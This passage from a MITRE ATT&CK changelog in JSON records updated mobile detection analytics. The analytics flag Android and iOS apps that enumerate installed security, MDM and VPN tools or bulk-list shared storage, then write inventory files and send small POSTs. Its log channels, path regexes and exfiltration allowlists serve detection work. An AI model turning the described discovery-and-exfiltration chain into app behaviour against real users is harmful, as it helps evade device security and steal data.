                            "description": "Regex/prefix list of AV/EDR/MDM/VPN packages & services to elevate severity."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for local inventory artifacts (DB/JSON/TXT) in app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Allowlisted analytics/endpoints to suppress FPs."
                        },
                        {
                            "field": "WorkProfileOnly",
                            "description": "Scope to Work Profile events to reduce personal-profile noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from discovery burst to persist/exfil (e.g., 10\\u2013120s).\"}, {\"field\": \"MinEnumCount\", \"description\": \"Minimum API calls/rows indicating inventory (e.g., \\u226530 in 10s).\"}, {\"field\": \"SecurityTargetsList\", \"description\": \"Regex/prefix list of AV/EDR/MDM/VPN packages & services to elevate severity.\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for local inventory artifacts (DB/JSON/TXT) in app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Allowlisted analytics/endpoints to suppress FPs.\"}, {\"field\": \"WorkProfileOnly\", \"description\": \"Scope to Work Profile events to reduce personal-profile noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-02 16:07:33.370000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app enumerating installed security/management controls (AV/EDR/MDM/VPN/Play Protect) via PackageManager, DevicePolicyManager, AppOps, and Settings queries or shell \\u2018pm list\\u2019 usage, optionally probing Accessibility/Device Admin state. Enumeration is followed by local inventory artifact creation and/or small egress. Chain: capability to query \\u2192 burst of security-focused checks (packages/permissions/policies) \\u2192 optional foreground targeting \\u2192 artifact write \\u2192 quick POST.\", \"old_value\": \"Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"android:logcat\", \"channel\": \"Command 'pm list packages' executed by app sandbox or child proc\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\\\\\.(json|txt|db|plist)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to205__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to205__0\"><a href=\"#difflib_chg_to205__top\">t</a></td><td class=\"diff_header\" id=\"from205_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;the&nbsp;Android&nbsp;perm</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to205__top\">t</a></td><td class=\"diff_header\" id=\"to205_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;enumerating&nbsp;installed&nbsp;security/mana</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ission&nbsp;`android.permission.QUERY_ALL_PACKAGES`,&nbsp;and&nbsp;apply&nbsp;ex</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">gement&nbsp;controls&nbsp;(AV/EDR/MDM/VPN/Play&nbsp;Protect)&nbsp;via&nbsp;PackageMan</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tra&nbsp;scrutiny&nbsp;to&nbsp;applications&nbsp;that&nbsp;request&nbsp;it.&nbsp;On&nbsp;iOS,&nbsp;applic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ager,&nbsp;DevicePolicyManager,&nbsp;AppOps,&nbsp;and&nbsp;Settings&nbsp;queries&nbsp;or&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;usage&nbsp;of&nbsp;the&nbsp;private&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hell&nbsp;\u2018pm&nbsp;list\u2019&nbsp;usage,&nbsp;optionally&nbsp;probing&nbsp;Accessibility/Devic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">PI&nbsp;`LSApplicationWorkspace`&nbsp;and&nbsp;apply&nbsp;extra&nbsp;scrutiny&nbsp;to&nbsp;appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;Admin&nbsp;state.&nbsp;Enumeration&nbsp;is&nbsp;followed&nbsp;by&nbsp;local&nbsp;inventory&nbsp;ar</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ications&nbsp;that&nbsp;employ&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tifact&nbsp;creation&nbsp;and/or&nbsp;small&nbsp;egress.&nbsp;Chain:&nbsp;capability&nbsp;to&nbsp;qu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ery&nbsp;\u2192&nbsp;burst&nbsp;of&nbsp;security-focused&nbsp;checks&nbsp;(packages/permissions</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">/policies)&nbsp;\u2192&nbsp;optional&nbsp;foreground&nbsp;targeting&nbsp;\u2192&nbsp;artifact&nbsp;write&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">\u2192&nbsp;quick&nbsp;POST.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9c721bd4-75df-4381-bd70-29679aa78a4b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-02 16:21:09.206000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0680#AN1785",
                            "external_id": "AN1785"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1785",
                    "description": "Defender correlates app attempts to enumerate or infer security/management tooling (ManagedConfiguration/MDM presence, VPN/NEFilter config, AV/EDR app presence via LaunchServices or URL-scheme probing, private APIs) with local inventory persistence and egress. Chain: probe (MDM/NE/VPN/AV presence) \u2192 burst of LS/canOpenURL/ManagedConfiguration calls \u2192 inventory cache write \u2192 small POST.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from probe burst to persist/exfil (e.g., 10\u2013120s)."
                        },
                        {
                            "field": "MinProbeCount",
                            "description": "Minimum API/probe count to flag (e.g., \u226525/10s)."
                        },
                        {
                            "field": "SecurityTargetsList",
                            "description": "Schemes/bundle IDs for AV/EDR/MDM/VPN vendors (regex/prefix)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for inventory artifacts in app/extension containers."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good analytics/CDN allowlist."
                        },
                        {
                            "field": "JailbreakContext",
                            "description": "Escalate severity if private APIs used on non-managed devices."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from probe burst to persist/exfil (e.g., 10\\u2013120s).\"}, {\"field\": \"MinProbeCount\", \"description\": \"Minimum API/probe count to flag (e.g., \\u226525/10s).\"}, {\"field\": \"SecurityTargetsList\", \"description\": \"Schemes/bundle IDs for AV/EDR/MDM/VPN vendors (regex/prefix).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for inventory artifacts in app/extension containers.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good analytics/CDN allowlist.\"}, {\"field\": \"JailbreakContext\", \"description\": \"Escalate severity if private APIs used on non-managed devices.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-02 16:21:09.206000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates app attempts to enumerate or infer security/management tooling (ManagedConfiguration/MDM presence, VPN/NEFilter config, AV/EDR app presence via LaunchServices or URL-scheme probing, private APIs) with local inventory persistence and egress. Chain: probe (MDM/NE/VPN/AV presence) \\u2192 burst of LS/canOpenURL/ManagedConfiguration calls \\u2192 inventory cache write \\u2192 small POST.\", \"old_value\": \"Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of /Library/Caches/security_inventory.*\\\\\\\\.(json|plist|db)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to188__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to188__0\"><a href=\"#difflib_chg_to188__top\">t</a></td><td class=\"diff_header\" id=\"from188_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;the&nbsp;Android&nbsp;perm</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to188__top\">t</a></td><td class=\"diff_header\" id=\"to188_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;app&nbsp;attempts&nbsp;to&nbsp;enumerate&nbsp;or&nbsp;infer&nbsp;secur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ission&nbsp;`android.permission.QUERY_ALL_PACKAGES`,&nbsp;and&nbsp;apply&nbsp;ex</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ity/management&nbsp;tooling&nbsp;(ManagedConfiguration/MDM&nbsp;presence,&nbsp;V</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tra&nbsp;scrutiny&nbsp;to&nbsp;applications&nbsp;that&nbsp;request&nbsp;it.&nbsp;On&nbsp;iOS,&nbsp;applic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">PN/NEFilter&nbsp;config,&nbsp;AV/EDR&nbsp;app&nbsp;presence&nbsp;via&nbsp;LaunchServices&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;usage&nbsp;of&nbsp;the&nbsp;private&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;URL-scheme&nbsp;probing,&nbsp;private&nbsp;APIs)&nbsp;with&nbsp;local&nbsp;inventory&nbsp;per</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">PI&nbsp;`LSApplicationWorkspace`&nbsp;and&nbsp;apply&nbsp;extra&nbsp;scrutiny&nbsp;to&nbsp;appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sistence&nbsp;and&nbsp;egress.&nbsp;Chain:&nbsp;probe&nbsp;(MDM/NE/VPN/AV&nbsp;presence)&nbsp;\u2192</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ications&nbsp;that&nbsp;employ&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;burst&nbsp;of&nbsp;LS/canOpenURL/ManagedConfiguration&nbsp;calls&nbsp;\u2192&nbsp;invento</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ry&nbsp;cache&nbsp;write&nbsp;\u2192&nbsp;small&nbsp;POST.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--36cb5f92-996c-42f4-be7e-43c5e21eee2e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-18 18:06:39.579000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0682#AN1788",
                            "external_id": "AN1788"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1788",
                    "description": "Defender observes an app (package/UID) issuing high-rate directory or content-index enumerations against external/shared storage or other apps\u2019 Documents/Media providers (logcat:ContentResolver, logcat:StorageAccessFramework), followed within a short window by bulk READ handles or stat/list calls over many distinct paths (logcat:FileIO). Activity occurs without foreground UI or exceeds typical per-app baseline, indicating automated file/dir discovery rather than user-driven browsing. Correlate on package/UID/profile and time proximity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "android:logcat",
                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:logcat",
                            "channel": "READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Time window to correlate API queries with file listings (e.g., 30\u2013300s)."
                        },
                        {
                            "field": "MinDistinctPaths",
                            "description": "Minimum unique paths accessed to qualify as discovery (e.g., \u226550)."
                        },
                        {
                            "field": "BackgroundOnly",
                            "description": "Require app to be backgrounded to reduce user-driven noise."
                        },
                        {
                            "field": "TargetPathRegex",
                            "description": "Scope to enterprise-relevant locations (e.g., /Documents, /Android/media/<corp>)."
                        },
                        {
                            "field": "AllowlistedPackages",
                            "description": "Backup/DLP/security apps expected to enumerate broadly."
                        },
                        {
                            "field": "ProfileScope",
                            "description": "Limit to Work Profile to reduce personal data noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Time window to correlate API queries with file listings (e.g., 30\\u2013300s).\"}, {\"field\": \"MinDistinctPaths\", \"description\": \"Minimum unique paths accessed to qualify as discovery (e.g., \\u226550).\"}, {\"field\": \"BackgroundOnly\", \"description\": \"Require app to be backgrounded to reduce user-driven noise.\"}, {\"field\": \"TargetPathRegex\", \"description\": \"Scope to enterprise-relevant locations (e.g., /Documents, /Android/media/<corp>).\"}, {\"field\": \"AllowlistedPackages\", \"description\": \"Backup/DLP/security apps expected to enumerate broadly.\"}, {\"field\": \"ProfileScope\", \"description\": \"Limit to Work Profile to reduce personal data noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-18 18:06:39.579000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app (package/UID) issuing high-rate directory or content-index enumerations against external/shared storage or other apps\\u2019 Documents/Media providers (logcat:ContentResolver, logcat:StorageAccessFramework), followed within a short window by bulk READ handles or stat/list calls over many distinct paths (logcat:FileIO). Activity occurs without foreground UI or exceeds typical per-app baseline, indicating automated file/dir discovery rather than user-driven browsing. Correlate on package/UID/profile and time proximity.\", \"old_value\": \"On Android, the user is presented with a permissions popup when an application requests access to external device storage.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"android:logcat\", \"channel\": \"READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:logcat\", \"channel\": \"READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to142__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to142__0\"><a href=\"#difflib_chg_to142__top\">t</a></td><td class=\"diff_header\" id=\"from142_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;is&nbsp;presented&nbsp;with&nbsp;a&nbsp;permissions&nbsp;popup&nbsp;w</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to142__top\">t</a></td><td class=\"diff_header\" id=\"to142_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;(package/UID)&nbsp;issuing&nbsp;high-rate&nbsp;dir</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">hen&nbsp;an&nbsp;application&nbsp;requests&nbsp;access&nbsp;to&nbsp;external&nbsp;device&nbsp;storag</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ectory&nbsp;or&nbsp;content-index&nbsp;enumerations&nbsp;against&nbsp;external/shared</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;storage&nbsp;or&nbsp;other&nbsp;apps\u2019&nbsp;Documents/Media&nbsp;providers&nbsp;(logcat:Co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ntentResolver,&nbsp;logcat:StorageAccessFramework),&nbsp;followed&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;a&nbsp;short&nbsp;window&nbsp;by&nbsp;bulk&nbsp;READ&nbsp;handles&nbsp;or&nbsp;stat/list&nbsp;calls&nbsp;ov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;many&nbsp;distinct&nbsp;paths&nbsp;(logcat:FileIO).&nbsp;Activity&nbsp;occurs&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">out&nbsp;foreground&nbsp;UI&nbsp;or&nbsp;exceeds&nbsp;typical&nbsp;per-app&nbsp;baseline,&nbsp;indic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ating&nbsp;automated&nbsp;file/dir&nbsp;discovery&nbsp;rather&nbsp;than&nbsp;user-driven&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rowsing.&nbsp;Correlate&nbsp;on&nbsp;package/UID/profile&nbsp;and&nbsp;time&nbsp;proximity</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--0048442c-54c9-4816-a2ba-5e9d376d0bf2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-18 19:33:15.080000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0682#AN1789",
                            "external_id": "AN1789"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1789",
